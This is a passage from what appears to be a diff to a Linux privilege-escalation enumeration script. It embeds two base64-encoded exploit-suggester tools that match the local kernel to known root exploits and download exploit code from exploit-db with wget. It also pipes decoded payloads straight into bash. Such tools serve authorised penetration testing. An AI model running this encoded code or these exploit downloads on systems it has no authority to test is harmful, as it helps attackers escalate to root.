c2VkIHRvIG5vdCBpbnRlcnByZXQgYmFja3NsYXNoIHVzZWQgZm9yIGJhc2ggY29sb3JzKQogICAgd2hpbGUgcmVhZCAtciBsaW5lCiAgICBkbwogICAgICAgIGFycltpXT0iJGxpbmUiCiAgICAgICAgaT0kKChpICsgMSkpCiAgICBkb25lIDw8PCAiJEVYUCIKCiAgICBOQU1FPSIke2FyclswXX0iICYmIE5BTUU9IiR7TkFNRTo2fSIKICAgIFJFUVM9IiR7YXJyWzFdfSIgJiYgUkVRUz0iJHtSRVFTOjZ9IgogICAgVEFHUz0iJHthcnJbMl19IiAmJiB0YWdzPSIke1RBR1M6Nn0iCgoJRVhQTE9JVF9EQj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiZXhwbG9pdC1kYjogIiB8IGF3ayAne3ByaW50ICQyfScpCglhbmFseXNpc191cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImFuYWx5c2lzLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglleHRfdXJsPSQoZWNobyAiJEVYUCIgfCBncmVwICJleHQtdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9JykKCWNvbW1lbnRzPSQoZWNobyAiJEVYUCIgfCBncmVwICJDb21tZW50czogIiB8IGN1dCAtZCcgJyAtZiAyLSkKCXJlcXM9JChlY2hvICIkRVhQIiB8IGdyZXAgIlJlcXM6ICIgfCBjdXQgLWQnICcgLWYgMikKCgkjIGV4cGxvaXQgbmFtZSB3aXRob3V0IENWRSBudW1iZXIgYW5kIHdpdGhvdXQgY29tbW9ubHkgdXNlZCBzcGVjaWFsIGNoYXJzCgluYW1lPSQoZWNobyAiJE5BTUUiIHwgY3V0IC1kJyAnIC1mIDItIHwgdHIgLWQgJyAoKS8nKQoKCWJpbl91cmw9JChlY2hvICIkRVhQIiB8IGdyZXAgImJpbi11cmw6ICIgfCBhd2sgJ3twcmludCAkMn0nKQoJc3JjX3VybD0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAic3JjLXVybDogIiB8IGF3ayAne3ByaW50ICQyfScpCglbIC16ICIkc3JjX3VybCIgXSAmJiBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBzcmNfdXJsPSJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9kb3dubG9hZC8kRVhQTE9JVF9EQiIKCVsgLXogIiRzcmNfdXJsIiBdICYmIFsgLXogIiRiaW5fdXJsIiBdICYmIGV4aXRXaXRoRXJyTXNnICInc3JjLXVybCcgLyAnYmluLXVybCcgLyAnZXhwbG9pdC1kYicgZW50cmllcyBhcmUgYWxsIGVtcHR5IGZvciAnJE5BTUUnIGV4cGxvaXQgLSBmaXggdGhhdC4gQWJvcnRpbmcuIgoKCWlmIFsgLW4gIiRhbmFseXNpc191cmwiIF07IHRoZW4KICAgICAgICBkZXRhaWxzPSIkYW5hbHlzaXNfdXJsIgoJZWxpZiAkKGVjaG8gIiRzcmNfdXJsIiB8IGdyZXAgLXEgJ3d3dy5leHBsb2l0LWRiLmNvbScpOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxpZiBbWyAiJHNyY191cmwiID1+IF4uKnRnenx0YXIuZ3p8emlwJCAmJiAtbiAiJEVYUExPSVRfREIiIF1dOyB0aGVuCiAgICAgICAgZGV0YWlscz0iaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvJEVYUExPSVRfREIvIgoJZWxzZQogICAgICAgIGRldGFpbHM9IiRzcmNfdXJsIgoJZmkKCgkjIHNraXAgRG9TIGJ5IGRlZmF1bHQKCWRvcz0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAtbyAtaSAiKGRvcyIpCglbICIkb3B0X3Nob3dfZG9zIiA9PSAiZmFsc2UiIF0gJiYgWyAtbiAiJGRvcyIgXSAmJiBjb250aW51ZQoKCSMgaGFuZGxlcyAtLWZldGNoLWJpbmFyaWVzIG9wdGlvbgoJaWYgWyAkb3B0X2ZldGNoX2JpbnMgPSAidHJ1ZSIgXTsgdGhlbgogICAgICAgIGZvciBpIGluICQoZWNobyAiJEVYUCIgfCBncmVwICJiaW4tdXJsOiAiIHwgYXdrICd7cHJpbnQgJDJ9Jyk7IGRvCiAgICAgICAgICAgIFsgLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiIF0gJiYgcm0gLWYgIiR7bmFtZX1fJChiYXNlbmFtZSAkaSkiCiAgICAgICAgICAgIHdnZXQgLXEgLWsgIiRpIiAtTyAiJHtuYW1lfV8kKGJhc2VuYW1lICRpKSIKICAgICAgICBkb25lCiAgICBmaQoKCSMgaGFuZGxlcyAtLWZldGNoLXNvdXJjZXMgb3B0aW9uCglpZiBbICRvcHRfZmV0Y2hfc3JjcyA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgWyAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIgXSAmJiBybSAtZiAiJHtuYW1lfV8kKGJhc2VuYW1lICRzcmNfdXJsKSIKICAgICAgICB3Z2V0IC1xIC1rICIkc3JjX3VybCIgLU8gIiR7bmFtZX1fJChiYXNlbmFtZSAkc3JjX3VybCkiICYKICAgIGZpCgogICAgIyBkaXNwbGF5IHJlc3VsdCAoc2hvcnQpCglpZiBbICIkb3B0X3N1bW1hcnkiID0gInRydWUiIF07IHRoZW4KCVsgLXogIiR0YWdzIiBdICYmIHRhZ3M9Ii0iCgllY2hvIC1lICIkTkFNRSB8fCAkdGFncyB8fCAkc3JjX3VybCIKCWNvbnRpbnVlCglmaQoKIyBkaXNwbGF5IHJlc3VsdCAoc3RhbmRhcmQpCgllY2hvIC1lICJbK10gJE5BTUUiCgllY2hvIC1lICJcbiAgIERldGFpbHM6ICRkZXRhaWxzIgogICAgICAgIGVjaG8gLWUgIiAgIEV4cG9zdXJlOiAkKGRpc3BsYXlFeHBvc3VyZSAkUkFOSykiCiAgICAgICAgWyAtbiAiJHRhZ3MiIF0gJiYgZWNobyAtZSAiICAgVGFnczogJHRhZ3MiCiAgICAgICAgZWNobyAtZSAiICAgRG93bmxvYWQgVVJMOiAkc3JjX3VybCIKICAgICAgICBbIC1uICIkZXh0X3VybCIgXSAmJiBlY2hvIC1lICIgICBleHQtdXJsOiAkZXh0X3VybCIKICAgICAgICBbIC1uICIkY29tbWVudHMiIF0gJiYgZWNobyAtZSAiICAgQ29tbWVudHM6ICRjb21tZW50cyIKCiAgICAgICAgIyBoYW5kbGVzIC0tZnVsbCBmaWx0ZXIgb3B0aW9uCiAgICAgICAgaWYgWyAiJG9wdF9mdWxsIiA9ICJ0cnVlIiBdOyB0aGVuCiAgICAgICAgICAgIFsgLW4gIiRyZXFzIiBdICYmIGVjaG8gLWUgIiAgIFJlcXVpcmVtZW50czogJHJlcXMiCgogICAgICAgICAgICBbIC1uICIkRVhQTE9JVF9EQiIgXSAmJiBlY2hvIC1lICIgICBleHBsb2l0LWRiOiAkRVhQTE9JVF9EQiIKCiAgICAgICAgICAgIGF1dGhvcj0kKGVjaG8gIiRFWFAiIHwgZ3JlcCAiYXV0aG9yOiAiIHwgY3V0IC1kJyAnIC1mIDItKQogICAgICAgICAgICBbIC1uICIkYXV0aG9yIiBdICYmIGVjaG8gLWUgIiAgIGF1dGhvcjogJGF1dGhvciIKICAgICAgICBmaQoKICAgICAgICBlY2hvCgpkb25lCg==" + echo $les_b64 | base64 -d | bash + if [ "$EXTRA_CHECKS" ]; then + echo $les_b64 | base64 -d | bash -s -- --checksec + fi + echo "" +fi + +if [ "$(command -v perl 2>/dev/null)" ]; then + print_2title "Executing Linux Exploit Suggester 2" + print_info "https://github.com/jondonas/linux-exploit-suggester-2" + les2_b64="IyEvdXNyL2Jpbi9wZXJsCnVzZSBzdHJpY3Q7CnVzZSB3YXJuaW5nczsKdXNlIEdldG9wdDo6U3RkOwoKb3VyICRWRVJTSU9OID0gJzInOwoKbXkgJW9wdHM7CmdldG9wdHMoICdrOmhkJywgXCVvcHRzICk7CmlmIChleGlzdHMgJG9wdHN7aH0pIHsKICAgIHVzYWdlKCk7CiAgICBleGl0Owp9OwoKcHJpbnRfYmFubmVyKCk7Cm15ICggJGtob3N0LCAkaXNfcGFydGlhbCApID0gZ2V0X2tlcm5lbCgpOwpwcmludCAiICBMb2NhbCBLZXJuZWw6IFxlWzAwOzMzbSRraG9zdFxlWzAwbVxuIjsKCm15ICVleHBsb2l0cyA9IGdldF9leHBsb2l0cygpOwpwcmludCAnICBTZWFyY2hpbmcgJyAuIHNjYWxhciBrZXlzKCVleHBsb2l0cykgLiAiIGV4cGxvaXRzLi4uXG5cbiI7CnByaW50ICIgIFxlWzE7MzVtUG9zc2libGUgRXhwbG9pdHNcZVswMG1cbiI7CgpteSAkY291bnQgPSAxOwpteSBAYXBwbGljYWJsZSA9ICgpOwpFWFBMT0lUOgpmb3JlYWNoIG15ICRrZXkgKCBzb3J0IGtleXMgJWV4cGxvaXRzICkgewogICAgZm9yZWFjaCBteSAka2VybmVsICggQHsgJGV4cGxvaXRzeyRrZXl9e3Z1bG59IH0gKSB7CgogICAgICAgIGlmICggICAgICRraG9zdCBlcSAka2VybmVsCiAgICAgICAgICAgICAgb3IgKCAkaXNfcGFydGlhbCBhbmQgaW5kZXgoJGtlcm5lbCwka2hvc3QpID09IDAgKQogICAgICAgICkgewogICAgICAgICAgICAkZXhwbG9pdHN7JGtleX17a2V5fSA9ICRrZXk7CiAgICAgICAgICAgIHB1c2goQGFwcGxpY2FibGUsICRleHBsb2l0c3ska2V5fSk7CiAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0kY291bnRcZVswMG1cZVswMDszM21dXGVbMDBtICI7CiAgICAgICAgICAgIHByaW50ICJcZVswMDszM20ka2V5XGVbMDBtIjsKICAgICAgICAgICAgcHJpbnQgIiBcZVswMDszM20oJGtlcm5lbClcZVswMG0iIGlmICRpc19wYXJ0aWFsOwoKICAgICAgICAgICAgbXkgJGFsdCA9ICRleHBsb2l0c3ska2V5fXthbHR9OwogICAgICAgICAgICBteSAkY3ZlID0gJGV4cGxvaXRzeyRrZXl9e2N2ZX07CiAgICAgICAgICAgIG15ICRtbHcgPSAkZXhwbG9pdHN7JGtleX17bWlsfTsKICAgICAgICAgICAgaWYgKCAkYWx0IG9yICRjdmUgKSB7CiAgICAgICAgICAgICAgICBwcmludCAiXG4iOwogICAgICAgICAgICB9CiAgICAgICAgICAgIGlmICggJGFsdCApIHsgcHJpbnQgIiAgICAgIEFsdDogJGFsdCAiOyB9CiAgICAgICAgICAgIGlmICggJGN2ZSApIHsgcHJpbnQgIiAgICAgIENWRS0kY3ZlIjsgfQogICAgICAgICAgICBpZiAoICRtbHcgKSB7IHByaW50ICJcbiAgICAgIFNvdXJjZTogJG1sdyI7IH0KICAgICAgICAgICAgcHJpbnQgIlxuIjsKICAgICAgICAgICAgJGNvdW50ICs9IDE7CiAgICAgICAgICAgIG5leHQgRVhQTE9JVDsKICAgICAgICB9CiAgICB9Cn0KcHJpbnQgIlxuIjsKCmlmICghQGFwcGxpY2FibGUpIHsKICAgIHByaW50ICIgIE5vIGV4cGxvaXRzIGFyZSBhdmFpbGFibGUgZm9yIHRoaXMga2VybmVsIHZlcnNpb25cblxuIjsKICAgIGV4aXQ7Cn0KCmlmIChleGlzdHMgJG9wdHN7ZH0pIHsKICAgIHByaW50ICIgIFxlWzE7MzZtRXhwbG9pdCBEb3dubG9hZFxlWzAwbVxuIjsKICAgIHByaW50ICIgIChEb3dubG9hZCBhbGw6IFxlWzAwOzMzbSdhJ1xlWzAwbSAvIEluZGl2aWR1YWxseTogXGVbMDA7MzNtJzIsNCw1J1xlWzAwbSAiOwogICAgcHJpbnQgIi8gRXhpdDogXGVbMDA7MzNtXmNcZVswMG0pXG4iOwogICAgcHJpbnQgIiAgU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwoKICAgIHdoaWxlICgxKSB7CiAgICAgICAgbXkgJGlucHV0ID0gPFNURElOPjsKICAgICAgICAkaW5wdXQgPX4gcy9ccysvL2c7CgogICAgICAgIGlmICgkaW5wdXQgPX4gL15hJC8pIHsKICAgICAgICAgICAgbXkgQHNlbGVjdGVkID0gKCk7CiAgICAgICAgICAgIGZvciAobXkgJGk9MTsgJGkgPD0gc2NhbGFyIEBhcHBsaWNhYmxlOyAkaSsrKSB7CiAgICAgICAgICAgICAgIHB1c2goQHNlbGVjdGVkLCAkaSk7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgbGFzdDsKICAgICAgICB9CiAgICAgICAgZWxzaWYgKCRpbnB1dCA9fiAvXigwfFsxLTldWzAtOV0qKSgsKDB8WzEtOV1bMC05XSopKSokLykgewogICAgICAgICAgICBteSBAc2VsZWN0ZWQgPSB1bmlxKHNwbGl0KCcsJywgJGlucHV0KSk7CiAgICAgICAgICAgIEBzZWxlY3RlZCA9IHNvcnQgeyRhIDw9PiAkYn0gQHNlbGVjdGVkOwogICAgICAgICAgICBpZiAoJHNlbGVjdGVkWzBdID4gMCAmJiAkc2VsZWN0ZWRbLTFdIDw9IHNjYWxhciBAYXBwbGljYWJsZSkgewogICAgICAgICAgICAgICAgZG93bmxvYWRfZXhwbG9pdHMoXEBzZWxlY3RlZCwgXEBhcHBsaWNhYmxlKTsKICAgICAgICAgICAgICAgIGxhc3Q7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWxzZSB7CiAgICAgICAgICAgICAgIHByaW50ICIgIFxlWzAwOzMxbUlucHV0IGlzIG91dCBvZiByYW5nZS5cZVswMG0gU2VsZWN0IGV4cGxvaXRzIHRvIGRvd25sb2FkOiAiOwogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGVsc2UgewogICAgICAgICAgICBwcmludCAiICBcZVswMDszMW1JbnZhbGlkIGlucHV0LlxlWzAwbSBTZWxlY3QgZXhwbG9pdHMgdG8gZG93bmxvYWQ6ICI7CiAgICAgICAgfQogICAgfQp9OwpleGl0OwoKIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIyBleHRyYSBmdW5jdGlvbnMgICMjCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKCnN1YiBnZXRfa2VybmVsIHsKICAgIG15ICRraG9zdCA9ICcnOwoKICAgIGlmICggZXhpc3RzICRvcHRze2t9ICkgewogICAgICAgICRraG9zdCA9ICRvcHRze2t9OwogICAgfQogICAgZWxzZSB7CiAgICAgICAgJGtob3N0ID0gYHVuYW1lIC1yIHxjdXQgLWQiLSIgLWYxYDsKICAgICAgICBjaG9tcCAka2hvc3Q7CiAgICB9CgogICAgaWYgKCFkZWZpbmVkICRraG9zdCB8fCAhKCRraG9zdCA9fiAvXlswLTldKyhbLl1bMC05XSspKiQvKSkgewogICAgICAgIHByaW50ICIgIFxlWzAwOzMxbVNwZWNpZmllZCBrZXJuZWwgaXMgaW4gdGhlIHdyb25nIGZvcm1hdFxlWzAwbVxuIjsKICAgICAgICBwcmludCAiICBUcnkgYSBrZXJuZWwgZm9ybWF0IGxpa2UgdGhpczogMy4yLjBcblxuIjsKICAgICAgICBleGl0OwogICAgfQoKICAgICMgcGFydGlhbCBrZXJuZWxzIG1pZ2h0IGJlIHByb3ZpZGVkIGJ5IHRoZSB1c2VyLAogICAgIyBzdWNoIGFzICcyLjQnIG9yICcyLjYuJwogICAgbXkgJGlzX3BhcnRpYWwgPSAka2hvc3QgPX4gL15cZCtcLlxkK1wuXGQ/LyA/IDAgOiAxOwogICAgcmV0dXJuICggJGtob3N0LCAkaXNfcGFydGlhbCApOwp9CgpzdWIgZG93bmxvYWRfZXhwbG9pdHMgewogICAgbXkgKCRzcmVmLCAkYXJlZikgPSBAXzsKICAgIG15IEBzZWxlY3RlZCA9IEB7ICRzcmVmIH07CiAgICBteSBAYXBwbGljYWJsZSA9IEB7ICRhcmVmIH07CiAgICBteSAkZXhwbG9pdF9iYXNlID0gInd3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cyI7CiAgICBteSAkZG93bmxvYWRfYmFzZSA9ICJodHRwczovL3d3dy5leHBsb2l0LWRiLmNvbS9yYXcvIjsKICAgIHByaW50ICJcbiI7CgogICAgZm9yZWFjaCBteSAkbnVtIChAc2VsZWN0ZWQpIHsKICAgICAgICBteSAkbWlsID0gJGFwcGxpY2FibGVbJG51bS0xXXttaWx9OwogICAgICAgIG5leHQgaWYgKCFkZWZpbmVkICRtaWwpOwogICAgICAgIG15ICgkZXhwbG9pdF9udW0pID0gKCRtaWwgPX4gL14uKlwvKFsxLTldWzAtOV0qKVwvPyQvKTsKICAgICAgICAKICAgICAgICBpZiAoJGV4cGxvaXRfbnVtICYmIGluZGV4KCRtaWwsICRleHBsb2l0X2Jhc2UpICE9IC0xKSB7CiAgICAgICAgICAgIG15ICR1cmwgPSAkZG93bmxvYWRfYmFzZSAuICRleHBsb2l0X251bTsKICAgICAgICAgICAgbXkgJGZpbGUgPSAiZXhwbG9pdF8kYXBwbGljYWJsZVskbnVtLTFde2tleX0iOwogICAgICAgICAgICBwcmludCAiICBEb3dubG9hZGluZyBcZVswMDszM20kdXJsXGVbMDBtIC0+IFxlWzAwOzMzbSRmaWxlXGVbMDBtXG4iOwogICAgICAgICAgICBzeXN0ZW0gIndnZXQgJHVybCAtTyAkZmlsZSA+IC9kZXYvbnVsbCAyPiYxIjsKICAgICAgICB9CiAgICAgICAgZWxzZSB7CiAgICAgICAgICAgIHByaW50ICIgIE5vIGV4cGxvaXQgY29kZSBhdmFpbGFibGUgZm9yIFxlWzAwOzMzbSRhcHBsaWNhYmxlWyRudW0tMV17a2V5fVxlWzAwbVxuIjsgCiAgICAgICAgfQogICAgfQogICAgcHJpbnQgIlxuIjsKfQoKc3ViIHVuaXEgewogICAgbXkgJXNlZW47CiAgICBncmVwICEkc2VlbnskX30rKywgQF87Cn0KCnN1YiB1c2FnZSB7CnByaW50X2Jhbm5lcigpOwpwcmludCAiICBcZVswMDszNW1Vc2FnZTpcZVswMG0gJDAgWy1oXSBbLWsga2VybmVsXSBbLWRdXG5cbiI7CnByaW50ICIgIFxlWzAwOzMzbVtcZVswMG1cZVswMDszMW0taFxlWzAwbVxlWzAwOzMzbV1cZVswMG0gSGVscCAodGhpcyBtZXNzYWdlKVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1rXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBLZXJuZWwgbnVtYmVyIChlZy4gMi42LjI4KVxuIjsKcHJpbnQgIiAgXGVbMDA7MzNtW1xlWzAwbVxlWzAwOzMxbS1kXGVbMDBtXGVbMDA7MzNtXVxlWzAwbSBPcGVuIGV4cGxvaXQgZG93bmxvYWQgbWVudVxuXG4iOwoKcHJpbnQgIiAgWW91IGNhbiBhbHNvIHByb3ZpZGUgYSBwYXJ0aWFsIGtlcm5lbCB2ZXJzaW9uIChlZy4gMi40KVxuIjsKcHJpbnQgIiAgdG8gc2VlIGFsbCBleHBsb2l0cyBhdmFpbGFibGUuXG5cbiI7Cn0KCnN1YiBwcmludF9iYW5uZXIgewpwcmludCAiXG5cZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG4iOwpwcmludCAiXGVbMTszMW0gICAgTGludXggRXhwbG9pdCBTdWdnZXN0ZXIgJFZFUlNJT05cZVswMG1cbiI7CnByaW50ICJcZVswMDszM20gICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXGVbMDBtXG5cbiI7Cn0KCnN1YiBnZXRfZXhwbG9pdHMgewogIHJldHVybiAoCiAgICAndzAwdCcgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi40LjEwJywgJzIuNC4xNicsICcyLjQuMTcnLCAnMi40LjE4JywKICAgICAgICAgICAgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywKICAgICAgICBdCiAgICB9LAogICAgJ2JyaycgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjEwJywgJzIuNC4xOCcsICcyLjQuMTknLCAnMi40LjIwJywgJzIuNC4yMScsICcyLjQuMjInIF0sCiAgICB9LAogICAgJ2F2ZScgPT4geyB2dWxuID0+IFsgJzIuNC4xOScsICcyLjQuMjAnIF0gfSwKCiAgICAnZWxmbGJsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNC4yOSddLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNzQ0JywKICAgIH0sCgogICAgJ2VsZmR1bXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40LjI3J10gfSwKICAgICdlbGZjZCcgICAgICAgID0+IHsgdnVsbiA9PiBbJzIuNi4xMiddIH0sCiAgICAnZXhwYW5kX3N0YWNrJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAoKICAgICdoMDBseXNoaXQnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi44JywgICcyLjYuMTAnLCAnMi42LjExJywgJzIuNi4xMicsCiAgICAgICAgICAgICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLAogICAgICAgIF0sCiAgICAgICAgY3ZlID0+ICcyMDA2LTM2MjYnLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDEzJywKICAgIH0sCgogICAgJ2tkdW1wJyA9PiB7IHZ1bG4gPT4gWycyLjYuMTMnXSB9LAogICAgJ2ttMicgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4yMicgXSB9LAogICAgJ2tyYWQnID0+CiAgICAgIHsgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdIH0sCgogICAgJ2tyYWQzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuNScsICcyLjYuNycsICcyLjYuOCcsICcyLjYuOScsICcyLjYuMTAnLCAnMi42LjExJyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL2V4cGxvaXQtZGIuY29tL2V4cGxvaXRzLzEzOTcnLAogICAgfSwKCiAgICAnbG9jYWwyNicgPT4geyB2dWxuID0+IFsnMi42LjEzJ10gfSwKICAgICdsb2tvJyAgICA9PiB7IHZ1bG4gPT4gWyAnMi40LjIyJywgJzIuNC4yMycsICcyLjQuMjQnIF0gfSwKCiAgICAnbXJlbWFwX3B0ZScgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi40LjIwJywgJzIuMi4yNCcsICcyLjQuMjUnLCAnMi40LjI2JywgJzIuNC4yNycgXSwKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMTYwJywKICAgIH0sCgogICAgJ25ld2xvY2FsJyA9PiB7IHZ1bG4gPT4gWyAnMi40LjE3JywgJzIuNC4xOScgXSB9LAogICAgJ29uZ19iYWsnICA9PiB7IHZ1bG4gPT4gWycyLjYuNSddIH0sCiAgICAncHRyYWNlJyA9PgogICAgICB7IHZ1bG4gPT4gWyAnMi40LjE4JywgJzIuNC4xOScsICcyLjQuMjAnLCAnMi40LjIxJywgJzIuNC4yMicgXSB9LAogICAgJ3B0cmFjZV9rbW9kJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjQuMTgnLCAnMi40LjE5JywgJzIuNC4yMCcsICcyLjQuMjEnLCAnMi40LjIyJyBdLAogICAgICAgIGN2ZSAgPT4gJzIwMDctNDU3MycsCiAgICB9LAogICAgJ3B0cmFjZV9rbW9kMicgPT4gewogICAgICAgIHZ1bG4gPT4gWwogICAgICAgICAgICAnMi42LjI2JywgJzIuNi4yNycsICcyLjYuMjgnLCAnMi42LjI5JywgJzIuNi4zMCcsICcyLjYuMzEnLAogICAgICAgICAgICAnMi42LjMyJywgJzIuNi4zMycsICcyLjYuMzQnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdpYTMyc3lzY2FsbCxyb2JlcnRfeW91X3N1Y2snLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8xNTAyMycsCiAgICAgICAgY3ZlID0+ICcyMDEwLTMzMDEnLAogICAgfSwKICAgICdwdHJhY2UyNCcgPT4geyB2dWxuID0+IFsnMi40LjknXSB9LAogICAgJ3B3bmVkJyAgICA9PiB7IHZ1bG4gPT4gWycyLjYuMTEnXSB9LAogICAgJ3B5MicgICAgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjE3JywgJzIuNi4xNScsICcyLjYuMTMnIF0gfSwKICAgICdyYXB0b3JfcHJjdGwnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMycsICcyLjYuMTQnLCAnMi42LjE1JywgJzIuNi4xNicsICcyLjYuMTcnIF0sCiAgICAgICAgY3ZlICA9PiAnMjAwNi0yNDUxJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvMjAzMScsCiAgICB9LAogICAgJ3ByY3RsJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA0JywKICAgIH0sCiAgICAncHJjdGwyJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA1JywKICAgIH0sCiAgICAncHJjdGwzJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDA2JywKICAgIH0sCiAgICAncHJjdGw0JyA9PiB7CiAgICAgICAgdnVsbiA9PiBbICcyLjYuMTMnLCAnMi42LjE0JywgJzIuNi4xNScsICcyLjYuMTYnLCAnMi42LjE3JyBdLAogICAgICAgIG1pbCA9PiAnaHR0cDovL3d3dy5leHBsb2l0LWRiLmNvbS9leHBsb2l0cy8yMDExJywKICAgIH0sCiAgICAncmVtYXAnICAgICAgPT4geyB2dWxuID0+IFsnMi40J10gfSwKICAgICdyaXAnICAgICAgICA9PiB7IHZ1bG4gPT4gWycyLjInXSB9LAogICAgJ3N0YWNrZ3JvdzInID0+IHsgdnVsbiA9PiBbICcyLjQuMjknLCAnMi42LjEwJyBdIH0sCiAgICAndXNlbGliMjQnID0+IHsKICAgICAgICB2dWxuID0+IFsgJzIuNi4xMCcsICcyLjQuMTcnLCAnMi40LjIyJywgJzIuNC4yNScsICcyLjQuMjcnLCAnMi40LjI5JyBdCiAgICB9LAogICAgJ25ld3NtcCcgICA9PiB7IHZ1bG4gPT4gWycyLjYnXSB9LAogICAgJ3NtcHJhY2VyJyA9PiB7IHZ1bG4gPT4gWycyLjQuMjknXSB9LAogICAgJ2xvZ2lueCcgICA9PiB7IHZ1bG4gPT4gWycyLjQuMjInXSB9LAogICAgJ2V4cC5zaCcgICA9PiB7IHZ1bG4gPT4gWyAnMi42LjknLCAnMi42LjEwJywgJzIuNi4xNicsICcyLjYuMTMnIF0gfSwKICAgICd2bXNwbGljZTEnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJzIuNi4xNycsICcyLjYuMTgnLCAnMi42LjE5JywgJzIuNi4yMCcsICcyLjYuMjEnLCAnMi42LjIyJywKICAgICAgICAgICAgJzIuNi4yMycsICcyLjYuMjQnLCAnMi42LjI0LjEnLAogICAgICAgIF0sCiAgICAgICAgYWx0ID0+ICdqZXNzaWNhIGJpZWwnLAogICAgICAgIGN2ZSA9PiAnMjAwOC0wNjAwJywKICAgICAgICBtaWwgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MicsCiAgICB9LAogICAgJ3Ztc3BsaWNlMicgPT4gewogICAgICAgIHZ1bG4gPT4gWyAnMi42LjIzJywgJzIuNi4yNCcgXSwKICAgICAgICBhbHQgID0+ICdkaWFuZV9sYW5lJywKICAgICAgICBjdmUgID0+ICcyMDA4LTA2MDAnLAogICAgICAgIG1pbCAgPT4gJ2h0dHA6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNTA5MycsCiAgICB9LAogICAgJ3Zjb25zb2xlJyA9PiB7CiAgICAgICAgdnVsbiA9PiBbJzIuNiddLAogICAgICAgIGN2ZSAgPT4gJzIwMDktMTA0NicsCiAgICB9LAogICAgJ3NjdHAnID0+IHsKICAgICAgICB2dWxuID0+IFsnMi42LjI2J10sCiAgICAgICAgY3ZlICA9PiAnMjAwOC00MTEzJywKICAgIH0sCiAgICAnZnRyZXgnID0+IHsKICAgICAgICB2dWxuID0+IFsKICAgICAgICAgICAgJz